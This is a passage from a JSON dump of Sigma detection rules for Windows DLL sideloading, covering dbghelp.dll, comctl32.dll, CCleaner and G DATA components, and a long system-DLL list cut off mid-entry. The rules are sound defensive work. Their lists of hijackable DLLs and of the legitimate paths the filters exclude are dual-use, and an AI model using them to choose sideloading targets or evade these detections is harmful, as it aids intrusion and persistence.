    "content": "title: Potential appverifUI.DLL Sideloading\nid: ee6cea48-c5b6-4304-a332-10fc6446f484\nstatus: test\ndescription: Detects potential DLL sideloading of \"appverifUI.dll\"\nreferences:\n    - https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\appverifUI.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\appverif.exe'\n            - 'C:\\Windows\\System32\\appverif.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml",
    "content": "title: Aruba Network Service Potential DLL Sideloading\nid: 90ae0469-0cee-4509-b67f-e5efcef040f7\nstatus: test\ndescription: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking\nreferences:\n    - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-03-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\arubanetsvc.exe'\n        ImageLoaded|endswith:\n            - '\\wtsapi32.dll'\n            - '\\msvcr100.dll'\n            - '\\msvcp100.dll'\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n            - '\\wininet.dll'\n            - '\\iphlpapi.dll'\n            - '\\version.dll'\n            - '\\cryptsp.dll'\n            - '\\cryptbase.dll'\n            - '\\wldp.dll'\n            - '\\profapi.dll'\n            - '\\sspicli.dll'\n            - '\\winsta.dll'\n            - '\\dpapi.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_avkkid.yml",
    "content": "title: Potential AVKkid.DLL Sideloading\nid: 952ed57c-8f99-453d-aee0-53a49c22f95d\nstatus: test\ndescription: Detects potential DLL sideloading of \"AVKkid.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\AVKkid.dll'\n    filter_main_legit_path:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\G DATA\\'\n            - 'C:\\Program Files\\G DATA\\'\n        Image|endswith: '\\AVKKid.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\G DATA\\'\n            - 'C:\\Program Files\\G DATA\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ccleaner_du.yml",
    "content": "title: Potential CCleanerDU.DLL Sideloading\nid: 1fbc0671-5596-4e17-8682-f020a0b995dc\nstatus: test\ndescription: Detects potential DLL sideloading of \"CCleanerDU.dll\"\nreferences:\n    - https://lab52.io/blog/2344-2/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\CCleanerDU.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\CCleaner\\'\n            - 'C:\\Program Files (x86)\\CCleaner\\'\n        Image|endswith:\n            - '\\CCleaner.exe'\n            - '\\CCleaner64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives could occur from other custom installation paths. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml",
    "content": "title: Potential CCleanerReactivator.DLL Sideloading\nid: 3735d5ac-d770-4da0-99ff-156b180bc600\nstatus: test\ndescription: Detects potential DLL sideloading of \"CCleanerReactivator.dll\"\nreferences:\n    - https://lab52.io/blog/2344-2/\nauthor: X__Junior\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\CCleanerReactivator.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\CCleaner\\'\n            - 'C:\\Program Files (x86)\\CCleaner\\'\n        Image|endswith: '\\CCleanerReactivator.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives could occur from other custom installation paths. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml",
    "content": "title: Potential Chrome Frame Helper DLL Sideloading\nid: 72ca7c75-bf85-45cd-aca7-255d360e423c\nstatus: test\ndescription: Detects potential DLL sideloading of \"chrome_frame_helper.dll\"\nreferences:\n    - https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\chrome_frame_helper.dll'\n    filter_main_path:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n    filter_optional_user_path:\n        ImageLoaded|contains: '\\AppData\\local\\Google\\Chrome\\Application\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_classicexplorer32.yml",
    "content": "title: Potential DLL Sideloading Via ClassicExplorer32.dll\nid: caa02837-f659-466f-bca6-48bde2826ab4\nstatus: test\ndescription: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software\nreferences:\n    - https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets\n    - https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/\nauthor: frack113\ndate: 2022-12-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_classicexplorer:\n        ImageLoaded|endswith: '\\ClassicExplorer32.dll'\n    filter_classicexplorer:\n        ImageLoaded|startswith: 'C:\\Program Files\\Classic Shell\\'\n    condition: selection_classicexplorer and not filter_classicexplorer\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_comctl32.yml",
    "content": "title: Potential DLL Sideloading Via comctl32.dll\nid: 6360757a-d460-456c-8b13-74cf0e60cceb\nstatus: test\ndescription: Detects potential DLL sideloading using comctl32.dll to obtain system privileges\nreferences:\n    - https://github.com/binderlabs/DirCreate2System\n    - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)\ndate: 2022-12-16\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\logonUI.exe.local\\'\n            - 'C:\\Windows\\System32\\werFault.exe.local\\'\n            - 'C:\\Windows\\System32\\consent.exe.local\\'\n            - 'C:\\Windows\\System32\\narrator.exe.local\\'\n            - 'C:\\windows\\system32\\wermgr.exe.local\\'\n        ImageLoaded|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_coregen.yml",
    "content": "title: Potential DLL Sideloading Using Coregen.exe\nid: 0fa66f66-e3f6-4a9c-93f8-4f2610b00171\nstatus: test\ndescription: Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/\nauthor: frack113\ndate: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1055\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\coregen.exe'\n    filter_main_legit_paths:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Silverlight\\'\n            - 'C:\\Program Files\\Microsoft Silverlight\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml",
    "content": "title: System Control Panel Item Loaded From Uncommon Location\nid: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde\nstatus: test\ndescription: |\n    Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.\nreferences:\n    - https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/\n    - https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/\n    - https://github.com/mhaskar/FsquirtCPLPoC\n    - https://securelist.com/sidewinder-apt/114089/\nauthor: Anish Bogati\ndate: 2024-01-09\nmodified: 2026-02-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\appwiz.cpl' # Usually loaded by fondue.exe\n            - '\\bthprops.cpl' # Usually loaded by fsquirt.exe\n            - '\\hdwwiz.cpl' # Usually loaded by hdwwiz.exe\n    filter_main_legit_location:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\Prefetch\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbgcore.yml",
    "content": "title: Potential DLL Sideloading Of DBGCORE.DLL\nid: 9ca2bf31-0570-44d8-a543-534c47c33ed7\nstatus: test\ndescription: Detects DLL sideloading of \"dbgcore.dll\"\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-10-25\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbgcore.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_steam:\n        ImageLoaded|endswith: '\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll'\n    filter_optional_opera:\n        # C:\\\\Users\\\\User\\\\AppData\\\\Local\\\\Temp\\\\.opera\\\\Opera Installer Temp\\\\opera_package_202311051506321\\\\assistant\\\\dbgcore.dll\n        ImageLoaded|contains: 'opera\\Opera Installer Temp\\opera_package'\n        ImageLoaded|endswith: '\\assistant\\dbgcore.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbghelp.yml",
    "content": "title: Potential DLL Sideloading Of DBGHELP.DLL\nid: 6414b5cd-b19d-447e-bb5e-9f03940b5784\nstatus: test\ndescription: Detects potential DLL sideloading of \"dbghelp.dll\"\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-10-25\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbghelp.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_anaconda:\n        ImageLoaded|endswith:\n            - '\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll'\n            - '\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll'\n    filter_optional_epicgames:\n        ImageLoaded|endswith:\n            - '\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll'\n            - '\\Epic Games\\MagicLegends\\x86\\dbghelp.dll'\n    filter_optional_opera:\n        ImageLoaded|contains: 'opera\\Opera Installer Temp\\opera_package'\n        ImageLoaded|endswith: '\\assistant\\dbghelp.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbgmodel.yml",
    "content": "title: Potential DLL Sideloading Of DbgModel.DLL\nid: fef394cd-f44d-4040-9b18-95d92fe278c0\nstatus: test\ndescription: Detects potential DLL sideloading of \"DbgModel.dll\"\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html\nauthor: Gary Lobermier\ndate: 2024-07-11\nmodified: 2024-07-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbgmodel.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_windbg:\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_'\n    filter_optional_windows_kits:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Windows Kits\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_eacore.yml",
    "content": "title: Potential EACore.DLL Sideloading\nid: edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5\nstatus: test\ndescription: Detects potential DLL sideloading of \"EACore.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\EACore.dll'\n    filter_main_legit_path:\n        Image|contains|all:\n            - 'C:\\Program Files\\Electronic Arts\\EA Desktop\\'\n            - '\\EACoreServer.exe'\n        ImageLoaded|startswith: 'C:\\Program Files\\Electronic Arts\\EA Desktop\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_edputil.yml",
    "content": "title: Potential Edputil.DLL Sideloading\nid: e4903324-1a10-4ed3-981b-f6fe3be3a2c2\nstatus: test\ndescription: Detects potential DLL sideloading of \"edputil.dll\"\nreferences:\n    - https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\edputil.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_from_non_system_location.yml",
    "content": "title: Potential System DLL Sideloading From Non System Locations\nid: 4fc0deee-0057-4998-ab31-d24e46e0aba4\nstatus: test\ndescription: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there). Wietze Beukema (project and research)\n    - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll\n    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll\n    - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex)\n    - https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\aclui.dll'\n            - '\\activeds.dll'\n            - '\\adsldpc.dll'\n            - '\\aepic.dll'\n            - '\\apphelp.dll'\n            - '\\applicationframe.dll'\n            - '\\appvpolicy.dll'\n            - '\\appxalluserstore.dll'\n            - '\\appxdeploymentclient.dll'\n            - '\\archiveint.dll'\n            - '\\atl.dll'\n            - '\\audioses.dll'\n            - '\\auditpolcore.dll'\n            - '\\authfwcfg.dll'\n            - '\\authz.dll'\n            - '\\avrt.dll'\n            - '\\batmeter.dll'\n            - '\\bcd.dll'\n            - '\\bcp47langs.dll'\n            - '\\bcp47mrm.dll'\n            - '\\bcrypt.dll'\n            - '\\bderepair.dll'\n            - '\\bootmenuux.dll'\n            - '\\bootux.dll'\n            - '\\cabinet.dll'\n            - '\\cabview.dll'\n            - '\\certcli.dll'\n            - '\\certenroll.dll'\n            - '\\cfgmgr32.dll'\n            - '\\cldapi.dll'\n            - '\\clipc.dll'\n            - '\\clusapi.dll'\n            - '\\cmpbk32.dll'\n            - '\\cmutil.dll'\n            - '\\coloradapterclient.dll'\n            - '\\colorui.dll'\n            - '\\comdlg32.dll'\n            - '\\configmanager2.dll'\n            - '\\connect.dll'\n            - '\\coredplus.dll'\n            - '\\coremessaging.dll'\n            - '\\coreuicomponents.dll'\n            - '\\credui.dll'\n            - '\\cryptbase.dll'\n            - '\\cryptdll.dll'\n            - '\\cryptsp.dll'\n            - '\\cryptui.dll'\n            - '\\cryptxml.dll'\n            - '\\cscapi.dll'\n            - '\\cscobj.dll'\n            - '\\cscui.dll'\n            - '\\d2d1.dll'\n            - '\\d3d10_1.dll'\n            - '\\d3d10_1core.dll'\n            - '\\d3d10.dll'\n            - '\\d3d10core.dll'\n            - '\\d3d10warp.dll'\n            - '\\d3d11.dll'\n            - '\\d3d12.dll'\n            - '\\d3d9.dll'\n            - '\\d3dx9_43.dll'\n            - '\\dataexchange.dll'\n            - '\\davclnt.dll'\n            - '\\dcntel.dll'\n            - '\\dcomp.dll'\n            - '\\defragproxy.dll'\n            - '\\desktopshellext.dll'\n            - '\\deviceassociation.dll'\n            - '\\devicecredential.dll'\n            - '\\devicepairing.dll'\n            - '\\devobj.dll'\n            - '\\devrtl.dll'\n            - '\\dhcpcmonitor.dll'\n            - '\\dhcpcsvc.dll'\n            - '\\dhcpcsvc6.dll'\n            - '\\directmanipulation.dll'\n            - '\\dismapi.dll'\n            - '\\dismcore.dll'\n            - '\\dmcfgutils.dll'\n            - '\\dmcmnutils.dll'\n            - '\\dmcommandlineutils.dll'\n            - '\\dmenrollengine.dll'\n            - '\\dmenterprisediagnostics.dll'\n            - '\\dmiso8601utils.dll'\n            - '\\dmoleaututils.dll'\n            - '\\dmprocessxmlfiltered.dll'\n            - '\\dmpushproxy.dll'\n            - '\\dmxmlhelputils.dll'\n            - '\\dnsapi.dll'\n            - '\\dot3api.dll'\n            - '\\dot3cfg.dll'\n            - '\\dpx.dll'\n            - '\\drprov.dll'\n            - '\\drvstore.dll'\n            - '\\dsclient.dll'\n            - '\\dsparse.dll'\n            - '\\dsprop.dll'\n            - '\\dsreg.dll'\n            - '\\dsrole.dll'\n            - '\\dui70.dll'\n            - '\\duser.dll'\n            - '\\dusmapi.dll'\n            - '\\dwmapi.dll'\n            - '\\dwmcore.dll'\n            - '\\dwrite.dll'\n            - '\\dxcore.dll'\n            - '\\dxgi.dll'\n            - '\\dxva2.dll'\n            - '\\dynamoapi.dll'\n            - '\\eappcfg.dll'\n            - '\\eappprxy.dll'\n            - '\\edgeiso.dll'\n            - '\\edputil.dll'\n            - '\\efsadu.dll'\n            - '\\efsutil.dll'\n            - '\\esent.dll'\n            - '\\execmodelproxy.dll'\n            - '\\explorerframe.dll'\n            - '\\fastprox.dll'\n            - '\\faultrep.dll'\n            - '\\fddevquery.dll'\n            - '\\feclient.dll'\n            - '\\fhcfg.dll'\n            - '\\fhsvcctl.dll'\n            - '\\firewallapi.dll'\n            - '\\flightsettings.dll'\n            - '\\fltlib.dll'\n            - '\\framedynos.dll'\n            - '\\fveapi.dll'\n            - '\\fveskybackup.dll'\n            - '\\fvewiz.dll'\n            - '\\fwbase.dll'\n            - '\\fwcfg.dll'\n            - '\\fwpolicyiomgr.dll'\n            - '\\fwpuclnt.dll'\n            - '\\fxsapi.dll'\n            - '\\fxsst.dll'\n            - '\\fxstiff.dll'\n            - '\\getuname.dll'\n            - '\\gpapi.dll'\n            - '\\hid.dll'\n            - '\\hnetmon.dll'\n            - '\\httpapi.dll'\n            - '\\icmp.dll'\n            - '\\idstore.dll'\n            - '\\ieadvpack.dll'\n            - '\\iedkcs32.dll'\n            - '\\iernonce.dll'\n            - '\\iertutil.dll'\n            - '\\ifmon.dll'\n            - '\\ifsutil.dll'\n            - '\\inproclogger.dll'\n            - '\\iphlpapi.dll'\n            - '\\iri.dll'\n            - '\\iscsidsc.dll'\n            - '\\iscsium.dll'\n            - '\\isv.exe_rsaenh.dll'\n            - '\\iumbase.dll'\n            - '\\iumsdk.dll'\n            - '\\joinutil.dll'\n            - '\\kdstub.dll'\n            - '\\ksuser.dll'\n            - '\\ktmw32.dll'\n            - '\\licensemanagerapi.dll'\n            - '\\licensingdiagspp.dll'\n            - '\\linkinfo.dll'\n            - '\\loadperf.dll'\n            - '\\lockhostingframework.dll'\n            - '\\logoncli.dll'\n            - '\\logoncontroller.dll'\n            - '\\lpksetupproxyserv.dll'\n            - '\\lrwizdll.dll'\n            - '\\magnification.dll'\n            - '\\maintenanceui.dll'\n            - '\\mapistub.dll'\n            - '\\mbaexmlparser.dll'\n            - '\\mdmdiagnostics.dll'\n            - '\\mfc42u.dll'\n            - '\\mfcore.dll'\n            - '\\mfplat.dll'\n            - '\\mi.dll'\n            - '\\midimap.dll'\n            - '\\mintdh.dll'\n            - '\\miutils.dll'\n            - '\\mlang.dll'\n            - '\\mmdevapi.dll'\n            - '\\mobilenetworking.dll'\n            - '\\mpr.dll'\n            - '\\mprapi.dll'\n            - '\\mrmcorer.dll'\n            - '\\msacm32.dll'\n            - '\\mscms.dll'\n            - '\\mscoree.dll'\n            - '\\msctf.dll'\n            - '\\msctfmonitor.dll'\n            - '\\msdrm.dll'\n            - '\\msdtctm.dll'\n            - '\\msftedit.dll'\n            - '\\msi.dll'\n            - '\\msiso.dll'\n            - '\\msutb.dll'\n            - '\\msvcp110_win.dll'\n            - '\\mswb7.dll'\n            - '\\mswsock.dll'\n            - '\\msxml3.dll'\n            - '\\mtxclu.dll'\n            - '\\napinsp.dll'\n            - '\\ncrypt.dll'\n            - '\\ndfapi.dll'\n            - '\\netapi32.dll'\n            - '\\netid.dll'\n            - '\\netiohlp.dll'\n            - '\\netjoin.dll'\n            - '\\netplwiz.dll'\n            - '\\netprofm.dll'\n            - '\\netprovfw.dll'\n            - '\\netsetupapi.dll'\n            - '\\netshell.dll'\n            - '\\nettrace.dll'\n            - '\\netutils.dll'\n            - '\\networkexplorer.dll'\n            - '\\newdev.dll'\n            - '\\ninput.dll'\n            - '\\nlaapi.dll'\n            - '\\nlansp_c.dll'\n            - '\\npmproxy.dll'\n            - '\\nshhttp.dll'\n            - '\\nshipsec.dll'\n            - '\\nshwfp.dll'\n            - '\\ntdsapi.dll'\n            - '\\ntlanman.dll'\n            - '\\ntlmshared.dll'\n            - '\\ntmarta.dll'\n            - '\\ntshrui.dll'\n            - '\\oleacc.dll'\n            - '\\omadmapi.dll'\n            - '\\onex.dll'\n            - '\\opcservices.dll'\n            - '\\osbaseln.dll'\n            - '\\osksupport.dll'\n            - '\\osuninst.dll'\n            - '\\p2p.dll'\n            - '\\p2pnetsh.dll'\n            - '\\p9np.dll'\n            - '\\pcaui.dll'\n            - '\\pdh.dll'\n            - '\\peerdistsh.dll'\n            - '\\pkeyhelper.dll'\n            - '\\pla.dll'\n            - '\\playsndsrv.dll'\n            - '\\pnrpnsp.dll'\n            - '\\policymanager.dll'\n            - '\\polstore.dll'\n            - '\\powrprof.dll'\n            - '\\printui.dll'\n            - '\\prntvpt.dll'\n            - '\\profapi.dll'\n            - '\\propsys.dll'\n            - '\\proximitycommon.dll'\n            - '\\proximityservicepal.dll'\n            - '\\prvdmofcomp.dll'\n            - '\\puiapi.dll'\n            - '\\radcui.dll'\n            - '\\rasapi32.dll'\n            - '\\rasdlg.dll'\n            - '\\rasgcw.dll'\n            - '\\rasman.dll'\n            - '\\rasmontr.dll'\n            - '\\reagent.dll'\n            - '\\regapi.dll'\n            - '\\reseteng.dll'\n            - '\\resetengine.dll'\n            - '\\resutils.dll'\n            - '\\rmclient.dll'\n            - '\\rpcnsh.dll'\n            - '\\rsaenh.dll'\n            - '\\rtutils.dll'\n            - '\\rtworkq.dll'\n            - '\\samcli.dll'\n            - '\\samlib.dll'\n            - '\\sapi_onecore.dll'\n            - '\\sas.dll'\n            - '\\scansetting.dll'\n            - '\\scecli.dll'\n            - '\\schedcli.dll'\n            - '\\secur32.dll'\n            - '\\security.dll'\n            - '\\sensapi.dll'\n            - '\\shell32.dll'\n            - '\\shfolder.dll'\n            - '\\slc.dll'\n            - '\\snmpapi.dll'\n            - '\\spectrumsyncclient.dll'\n            - '\\spp.dll'\n            - '\\sppc.dll'\n            - '\\sppcext.dll'\n            - '\\srclient.dll'\n            - '\\srcore.dll'\n            - '\\srmtrace.dll'\n            - '\\srpapi.dll'\n            - '\\srvcli.dll'\n            - '\\ssp_isv.exe_rsaenh.dll'\n            - '\\ssp.exe_rsaenh.dll'\n            - '\\sspicli.dll'\n            - '\\ssshim.dll'\n            - '\\staterepository.core.dll'\n            - '\\structuredquery.dll'\n            - '\\sxshared.dll'\n            - '\\systemsettingsthresholdadminflowui.dll'\n            - '\\tapi32.dll'\n            - '\\tbs.dll'\n            - '\\tdh.dll'\n            - '\\textshaping.dll'\n            - '\\timesync.dll'\n            - '\\tpmcoreprovisioning.dll'\n            - '\\tquery.dll'\n            - '\\tsworkspace.dll'\n            - '\\ttdrecord.dll'\n            - '\\twext.dll'\n            - '\\twinapi.dll'\n            - '\\twinui.appcore.dll'\n            - '\\uianimation.dll'\n            - 